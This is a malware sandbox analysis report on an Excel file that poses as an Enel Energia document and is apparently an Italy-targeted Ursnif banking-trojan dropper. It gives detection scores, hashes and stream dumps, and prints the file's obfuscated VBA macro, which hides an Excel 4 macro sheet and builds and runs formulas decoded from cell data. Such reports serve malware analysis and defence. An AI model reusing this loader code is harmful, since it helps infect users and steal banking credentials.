Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 004192374854_4.xls

Overview

General Information

Sample Name:004192374854_4.xls
Analysis ID:504678
MD5:f480fc1afe995ae4cafcb89b83295d88
SHA1:441f53d97186305891267b6b98382f2a0fa180b7
SHA256:d29f6c42fa70b462166272142d33012c41c471ea2c02943fae147fbccd5420aa
Infos:

Most interesting Screenshot:

Detection

Ursnif Dropper
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2576 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 004192374854_4.xlsVirustotal: Detection: 8%Perma Link
Source: 004192374854_4.xlsReversingLabs: Detection: 11%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

E-Banking Fraud:

barindex
Detected Italy targeted Ursnif dropper documentShow sources
Source: Initial sampleOLE, VBA macro line: Ursnif specific tokens

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 004192374854_4.xlsOLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = sc_team: S_mes
Source: 004192374854_4.xlsOLE, VBA macro line: ActiveSheet.Visible = 0
Source: 004192374854_4.xlsOLE indicator, VBA macros: true
Source: 004192374854_4.xlsVirustotal: Detection: 8%
Source: 004192374854_4.xlsReversingLabs: Detection: 11%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRED79.tmpJump to behavior
Source: 004192374854_4.xlsOLE indicator, Workbook stream: true
Source: classification engineClassification label: mal60.bank.expl.winXLS@1/0@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 004192374854_4.xlsInitial sample: OLE summary comments = Enel Energia - Mercato libero dell'energia
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionScripting11OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
004192374854_4.xls9%VirustotalBrowse
004192374854_4.xls3%MetadefenderBrowse
004192374854_4.xls11%ReversingLabsScript.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:504678
Start date:18.10.2021
Start time:14:29:13
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 21s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:004192374854_4.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal60.bank.expl.winXLS@1/0@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to Italian - Italy
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active Picture Object
  • Active AutoShape Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Oct 18 10:07:46 2021, Last Saved Time/Date: Mon Oct 18 10:09:47 2021, Security: 0, Comments: Enel Energia - Mercato libero dell'energia
Entropy (8bit):6.0128480654935625
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:004192374854_4.xls
File size:59904
MD5:f480fc1afe995ae4cafcb89b83295d88
SHA1:441f53d97186305891267b6b98382f2a0fa180b7
SHA256:d29f6c42fa70b462166272142d33012c41c471ea2c02943fae147fbccd5420aa
SHA512:b5ea9a01308a6b84d89ba573a0a1957c448ea9e126323e748dfdae1caafbeed67d88188e3256799c40b5c0665370ff65985a41c38a0cdd2ff6fc6d30000c85f5
SSDEEP:1536:SsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0zCoyp6p2UUaVgO8f4QmMC:ShlYkEIuPm3fNRZmbaoFhZhR0cixIHm6
File Content Preview:........................>...................................M..................................................................................................................................................................................................

File Icon

Icon Hash:e4eea286a4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "004192374854_4.xls"

Indicators

Has Summary Info:True
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Code Page:1252
Comments:Enel Energia - Mercato libero dell'energia
Create Time:2021-10-18 09:07:46.324000
Last Saved Time:2021-10-18 09:09:47
Security:0

Document Summary

Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams with VBA

VBA File Name: Foglio1, Stream Size: 992
General
Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:Foglio1
Stream Size:992
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . l . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 6c ae c2 d1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5995
General
Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:Questa_cartella_di_lavoro
Stream Size:5995
Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . 6 . . . . . . . . . . . l . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . g . . . . O . . 3 . ^ . x . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . b > , . B B . . 4 S . p . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . b > , . B B . . 4 S . p . = . . g . . . . O . . 3 . ^ . x . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 03 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 36 13 00 00 00 00 00 00 01 00 00 00 6c ae e2 1e 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 8c a9 67 e2 86 d1 02 4f 90 a1 33 8e 5e c5 78 09 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function q_sin(a As String)
q_sin = Len(a)
End Function

Function Onto()
Onto = "T" & R_Rt & "O" & "()"
End Function

Function ritor_n(dd As String, i As Integer)
i = r: Sheets(1).[D4].FormulaLocal = dd
End Function

Function r_itorn()
r_itorn = m_tf & "R" & "I"
End Function
Function b_ella()
rom = 7: Sheets(4 - 3).Cells(27, 4).FormulaLocal = r_itorn & Onto
End Function

Sub I_ingrandisci_immage()
ec_e = 3
Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = sc_team: S_mes
v_ve = mi_i
For Each Ax In rem_m
ec_e = 1: ec_e = 5: vG = (ritor_n(m_tf & Ax, 1 + ec_e)): ec_e = 112: Lii ((ec_e))
Next
End Sub

Function mi_i()
mi_i = b_ella
End Function

Sub S_mes()
ActiveSheet.Visible = 0
End Sub
Function R_Rt() As String
R_Rt = sc_team & "RN"
End Function
Sub Lii(w As Long)
numm = w: Run ("" & "D" & 3)
End Sub
Function rem_m() As Variant
For Each Xd In amsoO(Cells(155, 2), 3)
If Not (IsNumeric(Xd)) Then gj = LTrim(Left(Xd, q_sin("" & Xd) - 1)) Else gj = LTrim(Xd)
eh = eh & Chr(gj)
Next
rem_m = Split(eh, "" & "k")
End Function

Function sc_team() As String
sc_team = "O"
End Function
Function m_tf()
m_tf = sc_team: m_tf = "="
End Function

Public Function amsoO(a As String, z As Long) As Variant
Dim q As Long, pk As Long
Dim il() As String
ReDim il(0 To CLng((q_sin(a) / z) - 1))
For q = 1 To q_sin(a) Step z
il(pk) = Mid(a, q, z): pk = pk + 1
Next
amsoO = il
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118
General
Stream Path:\x1CompObj
File Type:data
Stream Size:118
Entropy:4.32915524493
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F * . . . ( F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 2a 00 00 00 28 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 248
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:248
Entropy:2.76031921322
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F o g l i o 1 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a0 00 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 196
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:196
Entropy:3.83679035111
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . @ . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . + . . . E n e l E n e r g i a - M e r c a t o l i b e r o d e l l ' e n e r g i a . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 94 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 0c 00 00 00 40 00 00 00 0d 00 00 00 4c 00 00 00 13 00 00 00 58 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 40 00 00 00 40 0d dc 9d ff c3 d7 01 40 00 00 00
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 37624
General
Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16
Stream Size:37624
Entropy:6.95337905268
Base64 Encoded:True
Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C
Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 460
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:460
Entropy:5.40240561228
Base64 Encoded:True
Data ASCII:I D = " { 9 C 2 4 6 F 7 F - D 3 1 A - 4 C E 0 - 8 F B 5 - B 2 1 3 9 9 7 F D 9 5 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 F 2 D 3 F 1 2 4 1 6 E 7 4 7 2 7 4 7 2 7 4 7 2 7 4 7 2 " . . D P B = " 5 E 5 C 4 E 4 3 5 2 5 D 8 0 5 E 8 0 5 E 8 0 "
Data Raw:49 44 3d 22 7b 39 43 32 34 36 46 37 46 2d 44 33 31 41 2d 34 43 45 30 2d 38 46 42 35 2d 42 32 31 33 39 39 37 46 44 39 35 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
General
Stream Path:_VBA_PROJECT_CUR/PROJECTwm
File Type:data
Stream Size:104
Entropy:3.33133492199
Base64 Encoded:False
Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2967
General
Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:data
Stream Size:2967
Entropy:4.42847128636
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:cc 61 b5 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2021
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:data
Stream Size:2021
Entropy:3.33587292125
Base64 Encoded:False
Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . D . . n . . K . Z . . e P . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 268
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:data
Stream Size:268
Entropy:1.7944240825
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . d d . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . z N . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 1677
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:data
Stream Size:1677
Entropy:2.23308967474
Base64 Encoded:False
Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 03 00 00 00 00 00 00 00 00 00 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 1000
General
Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:data
Stream Size:1000
Entropy:2.49581230808
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 08 01 d9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 563
General
Stream Path:_VBA_PROJECT_CUR/VBA/dir
File Type:data
Stream Size:563
Entropy:6.2569676839
Base64 Encoded:True
Data ASCII:. / . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . s . d c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:01 2f b2 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e4 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 b1 73 a0 64 63 17 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: EXCEL.EXE PID: 2576 Parent PID: 596

General

Start time:14:29:21
Start date:18/10/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f2d0000
